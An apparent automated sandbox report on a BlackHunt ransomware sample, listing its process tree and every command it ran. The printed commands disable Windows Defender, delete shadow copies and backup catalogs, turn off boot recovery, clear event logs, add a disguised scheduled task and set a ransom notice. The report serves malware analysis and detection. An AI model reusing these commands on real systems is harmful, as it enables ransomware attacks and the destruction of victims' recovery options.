wrote to memory of 3512 4744 8409ce922ea1e1430cf6373edfbcfe7bf6f83eb09b09e01677df30a6a32d40f5.exe 108 PID 4744 wrote to memory of 3512 4744 8409ce922ea1e1430cf6373edfbcfe7bf6f83eb09b09e01677df30a6a32d40f5.exe 108 PID 4744 wrote to memory of 3624 4744 8409ce922ea1e1430cf6373edfbcfe7bf6f83eb09b09e01677df30a6a32d40f5.exe 177 PID 4744 wrote to memory of 3624 4744 8409ce922ea1e1430cf6373edfbcfe7bf6f83eb09b09e01677df30a6a32d40f5.exe 177 PID 4744 wrote to memory of 2816 4744 8409ce922ea1e1430cf6373edfbcfe7bf6f83eb09b09e01677df30a6a32d40f5.exe 109 PID 4744 wrote to memory of 2816 4744 8409ce922ea1e1430cf6373edfbcfe7bf6f83eb09b09e01677df30a6a32d40f5.exe 109 PID 4744 wrote to memory of 2532 4744 8409ce922ea1e1430cf6373edfbcfe7bf6f83eb09b09e01677df30a6a32d40f5.exe 113 PID 4744 wrote to memory of 2532 4744 8409ce922ea1e1430cf6373edfbcfe7bf6f83eb09b09e01677df30a6a32d40f5.exe 113 PID 4744 wrote to memory of 2852 4744 8409ce922ea1e1430cf6373edfbcfe7bf6f83eb09b09e01677df30a6a32d40f5.exe 119 PID 4744 wrote to memory of 2852 4744 8409ce922ea1e1430cf6373edfbcfe7bf6f83eb09b09e01677df30a6a32d40f5.exe 119 PID 4744 wrote to memory of 2776 4744 8409ce922ea1e1430cf6373edfbcfe7bf6f83eb09b09e01677df30a6a32d40f5.exe 116 PID 4744 wrote to memory of 2776 4744 8409ce922ea1e1430cf6373edfbcfe7bf6f83eb09b09e01677df30a6a32d40f5.exe 116 PID 4672 wrote to memory of 1424 4672 cmd.exe 191 PID 4672 wrote to memory of 1424 4672 cmd.exe 191 PID 4744 wrote to memory of 1660 4744 8409ce922ea1e1430cf6373edfbcfe7bf6f83eb09b09e01677df30a6a32d40f5.exe 121 PID 4744 wrote to memory of 1660 4744 8409ce922ea1e1430cf6373edfbcfe7bf6f83eb09b09e01677df30a6a32d40f5.exe 121 PID 4744 wrote to memory of 5028 4744 8409ce922ea1e1430cf6373edfbcfe7bf6f83eb09b09e01677df30a6a32d40f5.exe 129 PID 4744 wrote to memory of 5028 4744 8409ce922ea1e1430cf6373edfbcfe7bf6f83eb09b09e01677df30a6a32d40f5.exe 129 PID 4744 wrote to memory of 3744 4744 8409ce922ea1e1430cf6373edfbcfe7bf6f83eb09b09e01677df30a6a32d40f5.exe 122 PID 4744 wrote to memory of 3744 4744 8409ce922ea1e1430cf6373edfbcfe7bf6f83eb09b09e01677df30a6a32d40f5.exe 122 PID 4744 wrote to memory of 3560 4744 8409ce922ea1e1430cf6373edfbcfe7bf6f83eb09b09e01677df30a6a32d40f5.exe 124 PID 4744 wrote to memory of 3560 4744 8409ce922ea1e1430cf6373edfbcfe7bf6f83eb09b09e01677df30a6a32d40f5.exe 124 PID 5088 wrote to memory of 464 5088 cmd.exe 125 PID 5088 wrote to memory of 464 5088 cmd.exe 125 PID 3624 wrote to memory of 1820 3624 Conhost.exe 128 PID 3624 wrote to memory of 1820 3624 Conhost.exe 128 PID 4744 wrote to memory of 3100 4744 8409ce922ea1e1430cf6373edfbcfe7bf6f83eb09b09e01677df30a6a32d40f5.exe 131 PID 4744 wrote to memory of 3100 4744 8409ce922ea1e1430cf6373edfbcfe7bf6f83eb09b09e01677df30a6a32d40f5.exe 131 PID 4744 wrote to memory of 3488 4744 8409ce922ea1e1430cf6373edfbcfe7bf6f83eb09b09e01677df30a6a32d40f5.exe 132 PID 4744 wrote to memory of 3488 4744 8409ce922ea1e1430cf6373edfbcfe7bf6f83eb09b09e01677df30a6a32d40f5.exe 132 PID 4744 wrote to memory of 404 4744 8409ce922ea1e1430cf6373edfbcfe7bf6f83eb09b09e01677df30a6a32d40f5.exe 135 PID 4744 wrote to memory of 404 4744 8409ce922ea1e1430cf6373edfbcfe7bf6f83eb09b09e01677df30a6a32d40f5.exe 135 PID 4744 wrote to memory of 4700 4744 8409ce922ea1e1430cf6373edfbcfe7bf6f83eb09b09e01677df30a6a32d40f5.exe 137 PID 4744 wrote to memory of 4700 4744 8409ce922ea1e1430cf6373edfbcfe7bf6f83eb09b09e01677df30a6a32d40f5.exe 137 PID 4560 wrote to memory of 636 4560 cmd.exe 139 PID 4560 wrote to memory of 636 4560 cmd.exe 139 PID 2532 wrote to memory of 320 2532 cmd.exe 141 PID 2532 wrote to memory of 320 2532 cmd.exe 141 PID 4744 wrote to memory of 1404 4744 8409ce922ea1e1430cf6373edfbcfe7bf6f83eb09b09e01677df30a6a32d40f5.exe 142 PID 4744 wrote to memory of 1404 4744 8409ce922ea1e1430cf6373edfbcfe7bf6f83eb09b09e01677df30a6a32d40f5.exe 142 PID 4744 wrote to memory of 2504 4744 8409ce922ea1e1430cf6373edfbcfe7bf6f83eb09b09e01677df30a6a32d40f5.exe 143 PID 4744 wrote to memory of 2504 4744 8409ce922ea1e1430cf6373edfbcfe7bf6f83eb09b09e01677df30a6a32d40f5.exe 143 -
System policy modification 1 TTPs 3 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System 8409ce922ea1e1430cf6373edfbcfe7bf6f83eb09b09e01677df30a6a32d40f5.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" 8409ce922ea1e1430cf6373edfbcfe7bf6f83eb09b09e01677df30a6a32d40f5.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLinkedConnections = "1" 8409ce922ea1e1430cf6373edfbcfe7bf6f83eb09b09e01677df30a6a32d40f5.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
-
C:\Users\Admin\AppData\Local\Temp\8409ce922ea1e1430cf6373edfbcfe7bf6f83eb09b09e01677df30a6a32d40f5.exe"C:\Users\Admin\AppData\Local\Temp\8409ce922ea1e1430cf6373edfbcfe7bf6f83eb09b09e01677df30a6a32d40f5.exe"1⤵
- UAC bypass
- Checks computer location settings
- Checks whether UAC is enabled
- Enumerates connected drives
- Sets desktop wallpaper using registry
- Drops file in Program Files directory
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
- System policy modification
PID:4744 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2" /f2⤵
- Suspicious use of WriteProcessMemory
PID:964 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2" /f3⤵PID:724
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2" /f2⤵
- Suspicious use of WriteProcessMemory
PID:4256 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2" /f3⤵
- Modifies registry class
PID:4888
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f2⤵
- Suspicious use of WriteProcessMemory
PID:832 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f3⤵
- Modifies registry class
PID:2224
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f2⤵
- Suspicious use of WriteProcessMemory
PID:2744 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f3⤵
- Modifies registry class
PID:396
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v "{2C5F9FCC-F266-43F6-BFD7-838DAE269E11}" /t REG_SZ /d "C:\ProgramData\#BlackHunt_ReadMe.hta" /f2⤵
- Suspicious use of WriteProcessMemory
PID:4672 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v "{2C5F9FCC-F266-43F6-BFD7-838DAE269E11}" /t REG_SZ /d "C:\ProgramData\#BlackHunt_ReadMe.hta" /f3⤵PID:1424
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f2⤵
- Suspicious use of WriteProcessMemory
PID:5088 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f3⤵PID:464
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f2⤵
- Suspicious use of WriteProcessMemory
PID:4560 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f3⤵
- Modifies Windows Defender Real-time Protection settings
PID:636
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d 2 /f2⤵PID:3512
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d 2 /f3⤵PID:2016
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Low" /t REG_DWORD /d 6 /f2⤵PID:2816
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Low" /t REG_DWORD /d 6 /f3⤵PID:4104
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats" /v "Threats_ThreatSeverityDefaultAction" /t REG_DWORD /d 1 /f2⤵PID:3624
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats" /v "Threats_ThreatSeverityDefaultAction" /t REG_DWORD /d 1 /f3⤵PID:1820
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Medium" /t REG_DWORD /d 6 /f2⤵
- Suspicious use of WriteProcessMemory
PID:2532 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Medium" /t REG_DWORD /d 6 /f3⤵PID:320
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Severe" /t REG_DWORD /d 6 /f2⤵PID:2776
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Severe" /t REG_DWORD /d 6 /f3⤵PID:4320
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "High" /t REG_DWORD /d 6 /f2⤵PID:2852
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "High" /t REG_DWORD /d 6 /f3⤵PID:4400
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\UX Configuration" /v "Notification_Suppress" /t REG_DWORD /d 1 /f2⤵PID:1660
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\UX Configuration" /v "Notification_Suppress" /t REG_DWORD /d 1 /f3⤵PID:4932
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "StartMenuLogOff" /t REG_DWORD /d 1 /f2⤵PID:3744
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "StartMenuLogOff" /t REG_DWORD /d 1 /f3⤵PID:1328
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableChangePassword" /t REG_DWORD /d 1 /f2⤵PID:3560
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableChangePassword" /t REG_DWORD /d 1 /f3⤵PID:4068
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoClose" /t REG_DWORD /d 1 /f2⤵PID:5028
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoClose" /t REG_DWORD /d 1 /f3⤵PID:3732
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f2⤵PID:3100
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f3⤵PID:2756
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "NoLogoff" /t REG_DWORD /d 1 /f2⤵PID:3488
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "NoLogoff" /t REG_DWORD /d 1 /f3⤵PID:2088
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f2⤵PID:404
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f3⤵PID:3224
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d 1 /f2⤵PID:4700
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d 1 /f3⤵PID:4920
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d 1 /f2⤵PID:1404
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d 1 /f3⤵PID:3112
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WinRE" /v "DisableSetup" /t REG_DWORD /d 1 /f2⤵PID:2504
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WinRE" /v "DisableSetup" /t REG_DWORD /d 1 /f3⤵PID:2372
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupLauncher" /t REG_DWORD /d 1 /f2⤵PID:3428
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupLauncher" /t REG_DWORD /d 1 /f3⤵PID:3704
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableRestoreUI" /t REG_DWORD /d 1 /f2⤵PID:1636
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableRestoreUI" /t REG_DWORD /d 1 /f3⤵PID:4240
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableSystemBackupUI" /t REG_DWORD /d 1 /f2⤵PID:2324
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableSystemBackupUI" /t REG_DWORD /d 1 /f3⤵PID:2432
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 1 /f2⤵PID:1144
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 1 /f3⤵PID:10072
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f2⤵PID:4412
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
- Modifies registry class
PID:724
-
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f3⤵PID:3040
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupUI" /t REG_DWORD /d 1 /f2⤵PID:4544
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupUI" /t REG_DWORD /d 1 /f3⤵PID:10080
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c SCHTASKS.exe /Create /RU "NT AUTHORITY\SYSTEM" /sc onstart /TN "Windows Critical Update" /TR "C:\Users\Admin\AppData\Local\Temp\8409ce922ea1e1430cf6373edfbcfe7bf6f83eb09b09e01677df30a6a32d40f5.exe" /F2⤵PID:2008
-
C:\Windows\system32\schtasks.exeSCHTASKS.exe /Create /RU "NT AUTHORITY\SYSTEM" /sc onstart /TN "Windows Critical Update" /TR "C:\Users\Admin\AppData\Local\Temp\8409ce922ea1e1430cf6373edfbcfe7bf6f83eb09b09e01677df30a6a32d40f5.exe" /F3⤵
- Creates scheduled task(s)
PID:640
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=unbounded2⤵PID:1852
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=unbounded3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:5476
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB2⤵PID:4440
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:7644
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB2⤵PID:588
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
- Suspicious use of WriteProcessMemory
PID:3624
-
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB3⤵
- Interacts with shadow copies
PID:5520
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin.exe Delete Shadows /all /quiet2⤵PID:116
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet3⤵
- Interacts with shadow copies
PID:8216
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=unbounded2⤵PID:1688
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=unbounded3⤵
- Interacts with shadow copies
PID:8200
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} recoveryenabled No2⤵PID:632
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled No3⤵
- Modifies boot configuration data using bcdedit
PID:8300
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable2⤵PID:2804
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable3⤵PID:9624
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wbadmin.exe delete catalog -quiet2⤵PID:1428
-
C:\Windows\system32\wbadmin.exewbadmin.exe delete catalog -quiet3⤵
- Deletes backup catalog
PID:8692
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil.exe usn deletejournal /D C:2⤵PID:2896
-
C:\Windows\system32\fsutil.exefsutil.exe usn deletejournal /D C:3⤵
- Deletes NTFS Change Journal
PID:8684
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} bootstatuspolicy IgnoreAllFailures2⤵PID:4896
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} bootstatuspolicy IgnoreAllFailures3⤵
- Modifies boot configuration data using bcdedit
PID:8712
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D F:\2⤵PID:7328
-
C:\Windows\system32\fsutil.exefsutil usn deletejournal /D F:\3⤵
- Enumerates connected drives
PID:11412
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D C:\2⤵PID:11288
-
C:\Windows\system32\fsutil.exefsutil usn deletejournal /D C:\3⤵PID:11460
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D M:\2⤵PID:11336
-
C:\Windows\system32\fsutil.exefsutil usn deletejournal /D M:\3⤵
- Enumerates connected drives
PID:11464
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Setup2⤵PID:11488
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Setup3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:22312
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl System2⤵PID:11504
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl System3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:11712
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Application2⤵PID:15960
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Application3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:11808
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Security2⤵PID:16148
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Security3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:11856
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Security /e:false2⤵PID:11560
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Security /e:false3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:11904
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin.exe Delete Shadows /all /quiet2⤵PID:22164
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet3⤵
- Interacts with shadow copies
PID:11948
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} recoveryenabled No2⤵PID:11780
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled No3⤵
- Modifies boot configuration data using bcdedit
PID:12052
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} bootstatuspolicy IgnoreAllFailures2⤵PID:11920
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} bootstatuspolicy IgnoreAllFailures3⤵
- Modifies boot configuration data using bcdedit
PID:12144
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil.exe usn deletejournal /D C:2⤵PID:11960
-
C:\Windows\system32\fsutil.exefsutil.exe usn deletejournal /D C:3⤵
- Deletes NTFS Change Journal
PID:12264
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wbadmin.exe delete catalog -quiet2⤵PID:12056
-
C:\Windows\system32\wbadmin.exewbadmin.exe delete catalog -quiet3⤵
- Deletes backup catalog
PID:20508
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable2⤵PID:12132
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable3⤵PID:20572
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c REG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticecaption" /t REG_SZ /d "WARNING WARNING WARNING. " /f2⤵PID:6980
-
C:\Windows\system32\reg.exeREG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticecaption" /t REG_SZ /d "WARNING WARNING WARNING. " /f3⤵PID:20604
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c SCHTASKS.exe /Delete /TN "Windows Critical Update" /F2⤵PID:9712
-
C:\Windows\system32\schtasks.exeSCHTASKS.exe /Delete /TN "Windows Critical Update" /F3⤵PID:20540
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c REG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticetext" /t REG_SZ /d " Your Network Infected With BlackHunt Ransomware Team. ALL Your important Files Encrypted and Stolen , Do You Want Your Files? read [ReadMe] Files carefully and contact us by [[email protected]] AND [[email protected]] " /f2⤵PID:9660
-
C:\Windows\system32\reg.exeREG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticetext" /t REG_SZ /d " Your Network Infected With BlackHunt Ransomware Team. ALL Your important Files Encrypted and Stolen , Do You Want Your Files? read [ReadMe] Files carefully and contact us by [[email protected]] AND [[email protected]] " /f3⤵PID:20548
-
-
-
